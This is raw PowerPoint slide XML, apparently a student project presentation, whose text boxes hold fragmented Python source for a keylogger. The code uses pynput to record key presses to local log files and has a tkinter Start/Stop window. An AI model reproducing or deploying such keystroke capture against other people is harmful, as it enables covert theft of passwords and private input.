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NAREN KUMAR G</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KINGS ENGINEERING COLLEGE</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2986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4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D579147-82B4-ECEE-E746-6A031DD058F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672C87D4-EE03-9E40-1F70-7E30C5B1C45F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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tk</a:t>
            </a:r>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tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>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 []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys =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generate_text_log</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with open('key_log.txt', "w+") as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keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key)</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with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>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wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log</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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</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).encode()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key_log.write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key_list_bytes</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on_press</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if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{'Pressed':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flag = True</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{'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        )</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </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 keys</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keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800"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if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" dirty="0">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
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{706462CE-42E3-1026-3BAD-37D9226805AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956335" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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keys = keys + str(key)</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generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</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on_press</a:t>
            </a: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r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</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listener.start</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def </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global listener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listener.stop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(text="Keylogger stopped.")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start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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root = Tk()</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root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">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label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(anchor=CENTER)</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label.pack</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text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</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start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, state='disabled')</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stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)</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root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="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1243</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kings engineering college</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T16:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-09T07:18:23Z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